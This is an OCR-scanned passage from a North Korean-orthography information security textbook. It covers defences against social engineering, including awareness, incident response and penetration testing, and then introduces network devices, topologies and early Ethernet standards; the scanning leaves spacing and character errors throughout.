적인 방도를 세우는것은 매우 쉽다. 이러한 형태의 연단을 마련할수 있는 좋은 방도 
는 내부망 Web 싸이트를 리용하여 거기 에 기 관의 방책 들은 물론 사회공학에 관한 재 
미 있는 이야기들과 이때 지켜야 할 안전사항과 안전정보를 담아 내놓는것이다. 사 
탐들이 흔히 남의 불행한 일에 대해 듣기 좋아한다는 사실을 고려할 때 이러한 재 
미 나는 이 야기 를 Web 싸이트에 실 으면 말하자는 내 용의 요점 이 더 널 리 잘 전 달될 수 
있 을것 이 다. 

《공적》에 대한 인정 

때로 그 무슨 공적에 대 하여 적극 인정해 주면 효과가 가장 클 때도 있다. 가령 한 
종업원의 정보보안사건과 관련한 문제에서 잘 처리했다고 하면 그 모범적인 행동을 평가 
하고 그에게 응당한 표창도 주어야 한다. 그러나 거기에 머무르면 안된다. 기관내 다른 
사람들모두가 이것을 다 알게 해야 한다. 그러면 결국에는 그 기관전체의 대응준비상태 
가 높아 질것 이다. 

사건대응팀의 준비 

모든 회사들은 사건과 같은것에 효과적으로 대응할수 있는 능력을 가지고 있어야 한 
다. 사건 이 란 회 사의 생 활을 위 협하는 그 어 떤 일 이 일 어 나는것 이 라고 정 의할수 있 다. 
정 보보안의 견지 에 서 볼 때 외 부적 인 위 협 (사회 공학까지 포함한)에 대 처하는것 이 곧 사 
건으로 된다. 잘 준비된 사고대응림의 목적은 있을수 있는 정보보안위반현상들을 적발하 
며 회사에 줄수 있는 영향을 없애는 방향에서 사태를 효과적으로 대처해 나갈수 있는 방 
도를 제공하는것 이 다. 2차적이면서도 역시 매우 중요한 목적은 적절한 행동방향을 취 함 
수 있는 충분한 정 보를 경 영측에 제 기하는것 이 다. 사회공학적 공격 에 대 처 한 교육과 전습 
을 받을수 있는 회사의 주요부서들에서 뽑은 지식 있는 인재들로 구성된 림을 가지는것 
은 효과적 인 정 보보안사업 의 관건적측면의 하나이 다. 

준비상태에 대한 시험 

침 투시 험 을 진행하는것 은 외 부사람의 견지 에 서 기 관의 보안대 책 들을 검 열 해 보는 하 
나의 방법 이 다. 좋기는 내부적침투와 외부적침투를 막거 나 추적하며 경 보신호를 내는 모 
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든 조치들을 다 시험해 보는것이다. 사회공학적공격에 대처한 준비상태를 검열해 보려는 
회사들은 이 방법을 리용하여 이전에 발견할수 없었던 약한 고리들을 찾아 낼수 있다. 
그러나 잊지 말아야 할것은 침투시험이 기관의 보안조치들을 평가해 낼수 있는 가장 좋 
은 방도의 하나이기는 하지만 그 시험을 집행하는 개별적사람들의 노력에 따라 그 효과 
가 좌우된다는것이다. 

공격대상에 대한 즉시적인 틍보체계 

어떤 사람이 사회공학적시도에 대하여 보고하거나 발견하면 류사한 부문에 있는 모 
든 사람들에게 통지해 주어야 한다. 바로 이 단계에서 표준공정과 신속한 실현절차를 가 
지는것이 매우 중요하다. 바로 이 분야가 잘 준비된 사건대응림이 나서서 도와 주어야 
할 분야이다. 그러나 절차가 있다고 가정하면 사건대응림은 재빨리 그 문제에 대처하여 
손해가 오기전에 효과적으로 그 위험을 제거할수 있다. 

필요한 끗에는 기술을 적용하라 종업원들에게 있을수 있는 위험성에 대해 알려 주며 
또 정보를 요구하는 동료나 다른 사람들을 어떻게 대상해야 하는가에 대하여 지도해 주 
는것을 내놓고는 사회공학으로부터 정보와 종업원들을 보호해 주는 공고한 다른 방법 이 
란 없다. 그러 나 다음과 같은 몇 가지 대 안들도 고려 해 볼 필요가 있다. 

• 가능하면 틍화를 추적하라 통화추적은 할수도 있고 안할수도 있지만 추적능력 
이 있고 또 추적준비가 되면 할수 있다. 공격을 받는 도중에 《어떻게 통화를 
추적한단 말인가》하고 생각하면서 망설이지 말아야 한다. 여기서도 마음의 
준비가 있어야 한다. 사건대응절차가 있어 효과적으로 이에 대처할수 있어야 
한다. 

• 물리적보안상태를 잘 유지하라 이미 언급된것처럼 보호체계를 잘 세우는데서 물 
리적보안을 잘 유지하는것은 필수적이다. 최신기술을 리용하여 자기의 자원을 
믿음직하게 보호할수 있는 방도는 많다. 생체계측기술인 스마트카드를 리용하는 
방법도 있다. 

• 자료분류기준에 따라 기밀문서들을 표시하라 정보분류기준을 잘 세워 놓으면 사회 

공학적공격이 있어도 기밀정보가 루설되는것을 막을수 있다. 실례로 그러한 공 
격에 넘어 가 어떤 문건을 꺼내다가도 그 문건에 쓰인 《 비밀》이라는 표식을 
보고 단념할수도 있다. 이와 근사하게 분류기준에 따라 파일을 전자적으로 표식 
해 놓아도 같은 효과를 기대할수 있다. 
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결 론 


공격자가 리용하는 사회공학적방법들은 그 어느 기관이든 정보의 안전에 심각한 
영향을 미친다. 이런 공격이 성공한 생동한 실례를 들자면 끝이 없다. 그러나 정보 
체계보안을 위한 일부 기초적인 원칙들을 준수하면 사회공학적공격의 위험성을 일 
정하게 약화시킬수 있다. 자기 기관에 맞게 방책을 잘 세워 극비 혹은 기밀로 되는 
정보를 정확히 다투고 열람하는 지침서를 제시해 둘 필요가 있다. 정보보안관념도 
매우 중요한 역할을 한다. 위험성들을 사람들이 다 알도록 하며 더 중요하게는 사건 
이 발생하는 경우 이에 어떻게 대응해야 하는가를 잘 알려 주어야 한다. 종업원들에 
게 정보보안의 중요성을 인식시키며 기밀정보를 손에 넣기 위해 자기들에게 접근하 
여 어째보려고 하는 자들이 있다는것을 알려 주는것은 벌써 방어의 현명한 첫 단계 

로 된다. 다만 있을수 있는 공격에 대하여 사람들에게 미리 경고해 두기만 해도 사 

탐들은 경각성을 높여 그런 자들을 적발하고 해당 조치를 취할수 있을것이다. 옛말 

에 《지식은 힘이다.》라고 하였는데 이것은 사실이며 이 경우에는 보안을 더욱 강 

화해 야 한다. 

방화벽 같은 기술적으로 공고한 안전장치들을 해 킹하는것보다 사람들을 해킹하는것 
이 훨씬 더 쉽다. 그러나 그 방화벽체계의 안전성을 잘 보장하는것보다 사람들을 교양하 
여 준비 시 켜 사회 공학적 시 도들을 예 방하고 색 출해 내 는것 역 시 품이 훨씬 더 적 게 든다. 
모든 기관들은 이제 더는 사람들을 정보보안이 라는 련쇄고리에서 가장 약한 고리로 보지 
않을것 이 다. 


的 



제 2 편 

원격통신과 망보안 


망으로 련결되는 범위가 늘어남에 따라 를퓨터사용은 상당히 광범해 지고 있다. 
원거리통신기술로 하여 나라의 방방곡곡 그 어디에서나 세계 어느 지역，어느 장소 
에서나 서로 정보를 신속히 주고받을수 있게 되였다. 이 제2편이 제일 방대한 부분 
으로 되는것은 그리 놀라운 일이 아니다. 그것은 이 부분이 정보통신기술의 보안과 
나날이 확대 되 는 인트라네 트，인 터네 트，엑 스트라네 트의 령역 까지 포괄하고 있기때 
문이 다. 

한개 기관의 령역을 보호하는데서 계속 중요한 역할을 수행하는 방화벽은 이 부 
분에 서 심 도 있게 보기 로 한다. 방화벽 이 란 본질 상 두개 의 망사이의 차단물로서 안으 
로 들어 오고 밖으로 나가는 모든 정 보흐름을 다 검 열하여 고정 된 규정 에 따라 그 전 
달을 허용하거나 거부한다. 이 부분에서는 려과장치들의 여러 측면들을 서로 비교해 
보게 된다. 

방화벽 이 일정한 수준의 보호는 해 주지 만 기 관의 정 보(례하면 전자우편)는 그 기 
관안팎으로 흐르게 되여야 한다. 그런데 이 통신통로를 개방하게 되면 위태로운 현상 
이 일 어 날수 있다. 이 부분에 서 는 정 보의 자유로운 흐름이 가져 올수 있는 약점 들과 
이 에 대 처 한 보호절 차와 봉사형 태 들을 포괄하여 알려 주게 된다. 1980년대 후반기 의 
콤퓨터비루스는 오늘날 사처에 퍼져 있는 《장난질코드》에 비해 보면 유순한편이다. 
정 보통신망으로 온 세계 가 뒤덮임 으로 하여 무엇 이든 신속히 복사할수 있게 되 였다. 
제조업체들이 내놓은 체계의 약점(혹은 기능)을 리용한 악명 높은 해킹프로그람들이 
미칠듯한 속도로 인터네트를 종횡무진하고 있다. 회사들이 될수록 빨리 대응책들을 
강구하고 있으나 내부기관들은 능력이나 도구가 부족하여 자기들의 기반을 미처 보 
강하지 못하고 있는 실정이다. 이 부분에서 볼수 있는바와 같이 일부 경우 대화식지 
원을 제 공하는 소규모제 조 및 판매 업 체 들은 스팸 과 악성비 루스와 갈은 위 험사건들에 
대처하기 위하여 내부적보안을 강화하는 사업에 봉사를 제공하기도 한다. 이 업체들 
은 또한 매주 7일간 매일 24시간의 감시체계도 제공하며 많은 경우 기관내적인 자원 
으로는 충당할수 없는 조기통지체계도 제공해 주고 있다. 

망으로 통과하는 자료들을 보호할수 있는 가장 성공적인 방도의 하나는 가상개별망 
( VPN ) 에서 쓰이는 교갑화와 암호화의 사용이다. 이 부분에서는 자료의 안전을 유지하면 
서도 공공망을 통하여 개인정보를 주고받고 하는 가상개별망의 개념과 원리들을 구체적 
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으로 보게 된다. 대상들과 거래를 안전하게 가질수 있고 상품 및 물품조달을 위한 새로 
운 통로를 제공하며 눅은 원가로 새로운 시장에 접근할수 있는 좋은 점을 가지고 있는 
외에도 이 VPN 들은 커다란 잠재력을 가지고 있다. 이 부분에서는 VPN 기술을 평가하고 
도입하며 리 용할수 있는 방도들과 이 기 술에 서 있을수 있는 약점 들을 깊 이 있게 파헤 쳐 
줄것 이 다. 

콤퓨터기술과 통신기술이 급속히 발전하며 기구들이 소형화되고 있으면서도 동시에 
기능화되여(소비자가 장소와 유선이나 무선에 관계없이 또 이동하면서도 봉사를 받을수 
있는) 이동성 (하드웨 어 나 쏘프트웨어 의 구성 요소가 쉽 게 변경 되 고 확장될수 있는)，융통 
성(통신접속시간과 통신과정에 드는 시간을 빠르게 하여 주는)， 신속성을 제공해 주고 
있 다. 

이 러 한것 들은 그 어 느 다른 분야보다도 무선통신에서 더 욱 그러하다. 특히 케 블의 
설치와 설정，선로련결장치들이 필요 없는것으로 하여 무선통신망들은 더욱더 원가가 적 
게 들고 있다. 그 어떤 유선장치에 속박됨이 없이 정보접근을 실현하려는 지향은 기업운 
영의 필수적요구로 제기되고 있다. 그리고 아직 유선통신세계가 자체의 취약성을 가지고 
있 는것 도 사실 이 다. 이 부분에 서 는 구내 통신망과 인터네 트상의 무선통신환경 을 물리 적층 
에서 어떻게 안전하게 구축하겠는가 하는 문제를 다투게 된다. 
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제 5 장. 보안과 망기술 


크리스 해어 


정보보안관계자들에게 있어서 망련결상태와 관련한 문제들을 점검하는것은 흔히 있 
는 일이기는 하지만 실지 망구성과 관련한 방법들과 기술에는 일정한 정도로 모르는 측 
면들도 있을수 있다. 이 장에서는 망이란 무엇이며 각이한 망구성방법에는 어떠한것들이 
있는가를 보기로 한다. 또한 망보안을 둘러 싼 여러 문제점들도 소개한다. 

사람들은 흔히 망을 통하여 육성，영상，음성 및 자료를 보낸다. 인터네트를 리용하여 은 
행거래를 하기도 한다. 직결상태에서 백과사전에서 필요한 정보를 검색하기도 한다. 친구들이 
나 가족들과 전자우편이나 영상전송을 통하여 련계를 가지기도 한다. 오늘날의 세계에서 전자 
수단을 통해 이렇듯 많은 정보가 교환되는 조건에서 정보보안실행자들이 오늘날의 를퓨터망 
체계에서 사용되고 있는 망하드웨어의 기초들을 잘 아는것은 초보적인 문제라고 할수 있다. 

망이란 무엇인가 


망이란 정보교환을 위하여 둘 또는 그이상의 서로 련결된 기구들을 말한다. 망이라 
고 하면 사람들은 콤퓨터망 즉 호상 정보를 교환하기 위하여 두대 이상의 콤퓨터가 가지 
고 있는 능력이라고 생각하게 된다. 사실 다른 형태의 망 즉 전화망，라지오망，텔레비존 
망도 있다. 지어 사람들이 서로 만나 교제하는 련락망도 구성할수 있다. 

이 장에서 망의 의미는 첫번째의것 즉 일정한 형태의 통신체계를 통하여 정보를 교 
환하는 두개 혹은 그이상의 기구들의 모임 인것 이 다. 

망 장 치 들 


망장치란 서로 다른 체계사이의 자료교환을 위하여 여러개의 망마디들을 서로 련결 
하는데 쓰이는 콤퓨터 혹은 위상구조에 따라 달라 지는 장치들을 말한다. 이러한 장치에 
는 반복기，망다리，경 로기，교환기 가 속한다. 

집선기 

집선기는 한 계렬의 많은 콤퓨터들을 하나의 장소에 집중적으로 련결시키는데 쓰인 
다. 집선기는 꼬임쌍선으로 콤퓨터를 서로 련결한다. 매국이 하나의 망케블로 련결된 전 
통적인 이씨네트망을 생각해 보라. 꼬임쌍선망은 이와는 다르다. 이것은 물리적으로 별형 
망이다. 매국에서 나오는 케블은 집선기를 통해서만 다른 국과 련결되여 있다. 
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집선기는 능동집선기와 피동집선기로 갈라 진다. 피동집선기는 자기의 모든 포 
구들중에서 들어 오는 신호를 분할하기만 한다. 능동집선기는 받은 신호를 다른 접 
근포구에 다시 송신해 준다. 능동집선기가 원격감시와 원격지원에 쓰인다면 피동집 
선기는 그렇지 못하다. 

집선기 ( hub ) 란 단어는 망다리，반복기，경로기, 교환기나 이 모든것들을 종합적으로 
부르는데 쓰이기도 한다. 

반복기 

반복기 는 한 망마디 에서의 신호를 원래 의 신호세 기 로 다른 마디 에 다시 보내준다. 
반복기는 해당 매체와의 최대거리가 초과할 때 서로 거리가 매우 먼 망들에서 쓸수 
있다. 실례 로 10 Base 5 망표준에서 는 두개의 국사이 에 최 대 4대의 반복기 를 사용한다. 
하나의 동축케블토막이 l ，500 m 이므로 반복기를 사용하면 망길이를 상당히 늘일수 있 
게 된다. 

망다리 

망다리는 물리적자료프레임에 있는 자료들을 읽고그 전송자료가 자기의 반대 
견에 있는 망에 보내 여 지 는 자료인가를 결정하는 방법 으로 작업 을 수행한다. 망다 
리 는 통표고리형망과 이써네 트망에 다 쓰인다. 망다리 는 프레 임 의 목적 지주소에 기 
초하여 복사해야 할 프레임을 복사만 하는 방법으로 두 곳을 통과하는 자료를 려과 
한다. 

경로기 

경 로기 는 망과 망사이에 서 자료들을 경 로조정해 주는데 쓰이 는 보다 정 교한 도구이 
다. 경로기는 망규약(실례로 IP ) 파케트에 있는 정보를 리용하여 그 파케트를 어데로 보내 
게 할것 인가를 결정한다. 경 로조정 규약을 통하여 받은 정 의된 설정값이 나 정 보에 기 초하 
여 파케트를 어데로 보낼것인가에 대한 정보를 수집하고 보관하는 기능이 경로기에 있다. 
많은 경 로기 들이 두개의 망을 련결시키 는 능력 밖에 없 다면 더 큰 규모의 경 로기 들은 각 
이한 매체에 련결된 수백개의 련결망들에 쓰이기도 한다. 


교환기 


교환기라는 용어가 지금 점점 더 혼동되고 있지만 본질상 여러개의 포구들을 가진 
망다리 라고 볼수 있 다. 교환기 는 회 전식교환기 와 매 우 근사하며 전통적 으로 일정한 기 간 
여러 망들을 련결시키는데 리용되여 왔다. 두개의 망은 일정한 시간동안에 서로 련결된 
다. 그러나 오늘날의 교환기들은 이 기능만 있는것이 아니라 그 능력을 제고하는 경로선 
택 지능도 가지 고 있 다. 
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두개 혹은 그이상의 LAN 이 동일한 지 리 적 위 치 즉 한 도시 에 있는 경 우에 만 그것 이 
MAN 으로 될수 있다는것을 잊으면 안된다. 례를 들어 그 기관이 뉴욕시에 두 사무실들 
을 가지고 있으면 그 련결망이 MAN 으로 되지만 한 사무실이 뉴욕에 있고 다른 사무실 
이 괜 프랜 씨스코에 있다면 더는 MAN 이 될수 없고 이때 에는 광지 역망 ( WAN:Wide Area 
Network ) 이 된다. 

이러한 망형태들이 결합되면 하나의 더 큰 망조직을 이루며 하나의 커다란 모임의 
망들을 망라시켜 정 보를 주고받게 된다. 사실상 그것 이 인 터네 트 즉 국부망，도시 망，광 
지 역 망들을 다 합쳐 묶어 놓은 인 터네 트로 되 는것 이 다. 

그러나 통신망은 개인이나 기관들로 하여금 위치에 관계없이 정보를 얻을수 있게 하 
지만 일련의 뚜렷한 부족점들도 있다. 이전에는 무엇을 훔치러면 건물을 뚫고 들어 가 
책장이나 책상을 바로 찾고 물리적으로 그 무엇인가를 꺼내와야 하였다. 현재 정보가 직 
결상태에서 보관되고 있는 조건에서 사람들은 더 많은 정보를 잃고 있으며 또 그것을 잃 
을 가능성도 더 많다. 

《도적》들이 물리적건물을 뚫고 들어 올 필요가 더는 없다. 망에서 《길》을 하나 
찾아 도적질만 하면 되는것이다. 그러나 설계를 잘하고 보안대책을 잘 세워 놓으면 통신 
망은 결함보다 우점 이 더 많을것 이 다. 

그렇 지 만 망도 일정한 구조를 가져 야 한다. 그러한 구조(혹은 위 상구조라고도 한다.) 
는 하나씩하나씩 서 로 련결된 콤퓨터 처 럼 간단한것 도 있으며 많은 콤퓨터 가 여 러 마디 로 
련결된 망처럼 복잡한것도 있다. 


망의 우 I 상구조 

하나의 망에는 여러가지 마디가 있다. 매 마디에는 설계에 사용된 케블의 종류에 따 
르는 일정한 수의 콤퓨터 가 있 다. 이 망들은 각이한 방식 으로 묶어 질수 있 다. 

점대점구조 

점대 점 구조의 망은 그림 5 — 3에 서 보는것 처 럼 정 확히 두개 의 망장치 가 포함된 망이 
다. 이 형식에서 두 기구는 흔히 서로 모뎀이나 전화선으로 련결되게 된다. 다른 물리적 
매 체 례하면 꼬임 쌍선도 쓸수 있지 만 전화선외 에 그것 들을 쓰는 경 우는 상당히 특수한 
경 우이 다. 이 런 형 식의 망에서 는 공격 이 이 두대 의 콤퓨터 자체 아니 면 물리 적준위 의 련 
결선에서 진행되게 된다. 련결자체를 상사형모뎀으로 하기때문에 소리를 엿듣고 다른 콤 


68 


그림 5-3. 점대점구조 








퓨터가 리해할수 있는 자료흐름을 구성하는것은 쉬운 일이다. 

모선령구조 

모선형망구조(그림 5_4)를 생각하면 10 Base 2 혹은 10 Base 5 동축케블배선이 떠오르게 
된다. 그것은 이러한 배선의 전기선구조가 모선 즉 전기선길이를 이루기때문이다. 이때 
콤퓨터들은 케블형태에 따르는 접속기 ( connector ) 를 통하여 케블에 련결되게 된다. 



그림 5-4. 간단한 모선형구조 


모선형망구조에서는 케블의 길이에 제한 받지 않는 한 누구도 몰래 콤퓨터엿보기도 
구나 망엿 보기 도구들을 부착시 킬수 있다. 예 비접속구 즉 쓰지 않는 접 속구가 있으면 그 
망을 통한 전송자료를 잡기 위한 망엿 보기 도구쯤 설 치하는것은 어 렵지 않다. 

직렬련결형구조 

직 렬 련결 형 망구조는 그림 5_5에 서 보는바와 같이 피 동의 뢰 기 (仕 dn - client : 의 뢰 기/봉사 
기체계 에서 소유 총 비용의 삭감을 목표로 하는 의뢰기하드웨 어의 구상안-역주)가 련결 
된 망이나 lOBase 2동축케블로 련결된 망에 쓰인다. 이러한 환경에서의 국간련결은 다중 
전화선련결이나 점대점련결을 리 용하여 콤퓨터들을 련결 하는 점대점련결회선을 이루든가 
아니 면 국대 국련결회 선을 형 성할수도 있 다. 



그림 5-5. 간단한 직렬련결형구조 


그림 을 보면 가운데국이 망기 판을 두개 가지 고 있는것 으로 보이 는데 그렇 지 않다. 
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별형망(그림 5_7)은 흔히 꼬임쌍선형환경에서 많이 볼수 있는데 이런 망에서 매 콤 
퓨터는 별형망의 가운데에 있는 집선장치와 자기사이에 련결선을 가지는 형식으로 서로 
련결되여 있다. 모든 를퓨터들에서 나온 케블은 모두 가운데 있는 집선장치에서 끝나는 
데 이 집선장치가 매 케블을 전기적으로 련결시켜 그 망을 형성시켜 준다. 이 집선장치 
를 집선기 라고 부론다. 

이 망구조는 모선구조의 망과 곡 갈은 문제점들을 안고 있다. 합법적 인 원래의 콤퓨 
터 한대를 다른것으로 교체하거나 별모양의 끝점 어디든지 아니면 가운데 있는 집선기에 
엿 보기 도구 ( sniffer ) 를 붙 이 는것 은 쉽 다. 

고리령구조 

고리형망구조(그림 5 — 8) 는 IBM 통표고리망에서 가장 많이 볼수 있다. 이 망에서는 
통표가 콤퓨터들사이로 전달된다. 통표가 없으면 그 어느 콤퓨터도 파케트를 방송할수 
없 다. 이 런 식 으로 통표를 리용하면 망에 있 는 각국에 서 통신을 주고받는 과정 을 통제할 
수 있다. 



그림 5-8. 통표고러구조 

그러 나 통표고리 형 망구조는 보기 에 고리형 으로 보이 지 만 그림 5_8에 서 보는바와 같 
이 전기배선상 별모양을 이룬다. 고리형망구조도 역시 매 콤퓨터가 다른 두개의 국과 통 
신을 어떻게 하겠는가를 알고 서로 련결되여 그림 5 — 9처럼 고리형태를 이룰 때에 형성 
되 게 된다. 이것은 이 두개의 다른 콤퓨터들에 의거하여 야 그밖의 다른 콤퓨터들과 통신 
을 할수 있 다는것 을 의 미한다. 
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이 구조의 망은 다중고장이 있어도 그 를퓨터가 다른 를퓨터들과 통신을 할수 있게 
하므로 상당히 강력한 구조의 망이다. 그림 5 -10 의 례를 리용해 보면 하나의 기계가 최 
고 4 번까지 의 실패 를 체 험할수도 있 다. 4 번의 실패 나 고장이 있어 도 콤퓨터 는 Web 과의 
통신을 유지한다. 그 콤퓨터 가 통신능력 을 다 잃거 나 망에서 제거 되지 않는 한 자료의 흐 
름은 계 속될 것 이 다. 

이것으로 하여 Web 망은 망고장에 상당히 잘 견디며 망고장률이 높은 경우에도 자료 
흐름을 충분히 보장한다. 망회로구성가격과 유지운영비가 높음에도 불구하고 많은 기관 
들이 바로 이 특성 으로 하여 이 망형 태 를 선택한다. 

지금까지 설명한 매 망형 태들은 자체의 고유한 망하드웨 어 와 위상구조를 가져 야 정 
보통신을 할수 있다. 그 기술과 작용원리는 거의 모든 사람들에게 다 잘 알려 져 있다. 
그리고 또 그렇게 모든 사람들에게 알려 져 야 하는것 이 다. 

망 의 방 식 

망설비 들은 일정한 형 태의 물리 적매 체를 리 용하여 련결되 여 야 한다. 케 블로 련결하 
는 방법은 가장 많이 쓰이는 망련결방식이다. 그러나 오늘날의 망에는 무선망도 있는바 
이것은 이동전화와 련결된 탁상형콤퓨터，무릎형콤퓨터 혹은 손바닥콤퓨터에도 적용 되 
고 있다. 여 러 가지 망결선방식 이 있지 만 가장 많이 쓰이 는 방식은 이써네 트와 통표고리 
형 이 다. 

이 두가지 형태의 망구성，그에 각각 해당되는 배선방식，설비，통신교환방법 등에 
대 하여 구체적 으로 쓰자면 큰 책 몇권은 잠간 될것 이 다. 따라서 이 장에서는 그 력사와 
각이한 매체형 태들만 간단히 보려 고 한다. 


이쎄 dl 트 


이써네트는 의심할바없이 현재 가장 널리 쓰이고 있는 국부망기술이다. 원래의 가장 
널 리 쓰던 이써네 트판은 10 Mbps 의 자료전송속도를 지 원하였지 만 새 로 개 발된 Fast 
Ethernet 와 Gigabit Ethernet 라고 부르는 개정 관.은 100 Mbps 와 1,000 Mbps 의 속도를 지 원 
하고 있다. 

이써네 트 LAN 들의 구성 은 동축케 블, 특별 한 등급의 꼬임 쌍선 혹은 빛섬 유케 블로 배 
선한다. 망결선방법의 견지에서 볼 때 가장 인기 있는것은 모선형망배선방식과 별형망배 
선 방식 이 다. 이 써 네 트기 구들은《 반송파수감다중접 근/충돌검 출》 ( CSMA / CD-Carrier Sense 
Multiple Access/Collision Detection ) 이 라고 부르는 규약을 리 용하면서 망접속을 서 로 경 쟁 
적으로 한다. 

Xerox Palo Alto 연구팬 터 ( PARC ) 의 봅 메트케 이프와 데이비드 복즈는 1970 년대에 시 
험적 으로 첫 이씨네 트체 계 를 개 발하였 다. 이것 을 리용하여 연구소에 Xerox Alto 콤퓨터들 
과 레이 자인쇄 기 를 련결 하여 자료전송속도 2. 94 Mbps (당시 로는 소박하고 지 금 수준에서 
는 낮은 속도임 )를 보장하였 다. Alto 콤퓨터 의 체 계박자수때 문에 당시 자료전송속도를 그 
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렇 게 정 하였 다. 이씨 네트기술은 모두 10MbpsCSMA/CD 규약에 기 초한다. 

10 Base 5 방식 이것을 흔히 망결선기술의 할아버지라고 하는데 그것은 이 방식이 
mmm 동축케 블로 10Mbps 의 전송속도를 지 원하는 원래 의 이 씨 네 트체 계 이 기 때 문이 다. 
10Base5 라는 표기 는 기 저 대 역전송형 태 인 10Mbps 의 전송속도와 500m 최 고유효길 이 를 간략 
하여 쓴것이다. 실지 이 케블은 많은 경우 더는 쓰이지 않는다. 그러나 그 기능들과 사용 
에 대하여 간단한 언급을 할수 있다. 

1980 년 9 월 Digital Equipment 회사，인텔회사，제록스회사는 DIX 표준이라는 이 세 회 
사의 첫 글자를 딴 첫 이씨네 트규격 1.0 관을 내 놓았다. 이 표준규격에 는《 굵은》이씨 네 
트체 계 (10Base5) 에 대 한 정 의 도 둘어 있 는데 여 기 서 《 굵은》이 라는것 은 망설 비 배 선 에 
쓰이는 그 굵은 동축케블이 라는 뜻이 다. 

워크스테이션위치를 명백히 하기 위하여 10Base5 굵은 이씨네트동축케블에는 2.5m 마 
다 표식을 해놓아 거기 에 송수신기(다중접속장치 MAU : Multiple Access units) 들을 붙일수 
있게 되여 있다. 송수신기들을 2.5m 마다 련결해 놓으면 전송질을 떨어 뜨리는 신호잡음 
을 최소화할수 있다. 


50 음 
종단기 



지선 


그림 5-11. 10Base5 국결선방식 

10Base5 송수신기는 케블에 구멍을 뚫어 전기케블과의 접촉을 보장하는 조임쇠에 곡 
지 를 련결하는 방법 으로 불인다(그림 5_11 을 볼것). 송수신기 #은 비 침입성곡지라고 부 
르는데 그것 은 전송정 보흐름을 방해하지 않고 살아 있는 망에 결선할수 있기 때 문이 다. 

국들을 송수신기 에 련결 하려 면 부착단위대 면부 즉 AUI 라고 하는 송수신기케 블을 통 
해 야 한다. 표준적 으로는 10Base5 에 련결되 는 콤퓨터 국에 는 이 씨 네 트망대 면기 판 (NIC) 한 
개 혹은 15 핀 AUI 포구를 가진 적 응기 기판이 하나 있 다. 그렇 기 때 문에 많은 망기 판들은 오 
늘도 15 핀 AUI 포구를 가지고 있다. 
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10Base5 동축케블 한 경 간의 길이는 최고 500m 이며 2. 5m 간격 으로 최고 100 대의 송 
수신기 를 하나의 경간에 련결 할수 있다. 10Base5 케 블경간이 라는것 은 끊기지 않는 련속적 
인 케블구간도 될수 있고 끝을 서로 이어 놓은 여러 케블토막의 결선일수도 있다. 

10Base5 배 선으로 잘 설 치하면 신뢰 성 이 매 우 높을수 있 으며 현존 케 블경간내 에 서 따 
기방법으로 새로운 국들을 쉽게 추가할수 있다. 그러나 케블자체가 굵고 무거우며 유연 
성 이 부족하므로 설 치하는데 난관이 있다. 게 다가 모선형위상구조에서 는 문제 가 제기된 
국을 고립시키기가 어려우며 그 동축케블은 지금까지 나온 더 높은 망통신속도를 지원하 
지 못하는 점도 있 다. 

10 Base 2 방식 《 가는》이써 네 트，값 눅은 네 트 (cheapernet) 혹은 10Base2 라고도 불리 
우는 제 2 판 이씨네 트는 1985 년에 나왔다. 이 두번째판 이써네 트는 보다 가늘고 보다 눅 
은 동축케블을 써서 망배선을 간단하게 해준다. 비록 이 두가지 즉 가는 체계와 굵은 체 
계 가 망의 성 능은 상당히 개 선시 켜 주지 만 모선형위 상구조를 리용하기 때 문에 망변경 이 
어 려우며 신뢰 성측면에 서 미 흡한 점 이 많다. 이 10Base2 방식 은 굵은이 써네 트표준이 후에 
나와서 처음으로 도입된 물리적매체의 변종이였다. 

굵은형이써네트와 가는형이써네트는 둘다 같은 망특성들을 가지고 있지만 
10Base2 에 쓰이는 가는케블은 10Base5 에서 쓰이는 굵은케블보다 더 눅고 더 가벼우며 
더 유연성 있고 설치하기 더 쉬운 장점들을 가지고 있다. 그러나 가는케블은 전송특 
성 이 굵은것 보다 좋지 못한 결점 도 있다. 가는케 블은 최 고경간길 이 가 185m(10Base5 가 
500m 인데 비 하여)인데 다가 매 케 블경간당 최 고 30 대 의 국 (10Base5 가 100 대 인데 비 하 
여)을 허용한다. 

10Base2 에서 는 10Base5 에서 처 럼 선따기 방법 으로 련결 하는것 이 아니 라 BNC T 형 접속 
기를 통하여 송수신기를 련결한다. 그 이름이 보여 주는것처럼 BNC T 형접속기는 T 자처 
럼 생겼다. 케블을 따라 흐르는 자료전송에 영향을 주지 않고 새로운 국을 추가할수 있 
는 10Base5 와는 달리 10Base2( 그림 5 — 12 에서 처 럼)에 서 는 망을 끈 다음에 야 새 로운 국을 
설치할수 있다. 이 런 방법으로 국들을 추가설치하거 나 해체하는것은 여기 에 쓰이는 접속 
구때 문이 다. 즉 이 렇 게 새 국을 련결시 키 려 면 케 블을 자르고 거 기 에 BNC 접 속구를 끼 
워 넣 어 야 하기때 문이 다. 주의하여 련결하지 못하는 경우 제대 로 련결되지 않은 접속구 
때문에 망전송자료들의 흐름이 장애될수 있는 가능성이 있다. 













BNC T 형 접 속구는 콤퓨터 의 이써네 트망대 면기 판 (NIC) 에 직 접 꽃을수도 있고 아니 면 
외 부에 있는 가는이 써네 트의 송수신기 에 꽃고 그것 을 표준 AUI 케 블을 거 쳐 NIC 에 꽃을수 
도 있 다. 만일 망에 서 국들을 해 체하는 경 우에 BNC T 형 접 속구는 떼 고 그대 신 BNC 관형 
접속구를 끼워 선로가 직선으로 련결되게 한다. 

10Base2 배선에 쓰이는 가는동축케블은 10Base5 에서 쓰이는 굵은케블에 비하여 설치 
작업하기가 상당히 쉬우며 외부적 인 송수신기를 없엠으로써 망설치비용이 더 눅다. 그러 
나 표준설 치 에서 는 그림 5 — 5 에서 본바와 같이 직 렬련결이므로 신뢰 도가 낮고 고장퇴 치 
가 더 욱 어 렵 다. 게 다가 일부 사무실환경 에서 는 직 렬련결구간설 치 가 어 려 우며 10Base5 처 
럼 피 동의 뢰기 망은 더 높은 망전송속도를 지 원 하지 못한다. 

10 B £ lSe-T 방식 10Base2 나 10Base5 방식의 망에서처 럼 10Base-T 방식도 10Mbps 의 전송 
속도만 지원한다. 그러나 이러한 기술들과는 달리 10Base-T 방식은 음성급이나 3 부류급 
혹은 더 좋은 전화회선망에 바탕을 두고 있다. 이 배선을 흔히 꼬임쌍선이라고 하는데 
여기서 한 쌍선은 자료전송에 그리고 다른 쌍선은 자료수신에 쓰인다. 이 배선의 량쪽 
끝에는 RJ_45 8 자리꽃개가 있어 야 한다. 꼬임쌍선이 급속히 사용됨으로써 10Base-T 방식 
이 오늘 가장 인기 있는 이씨네 트판으로 되 였다. 

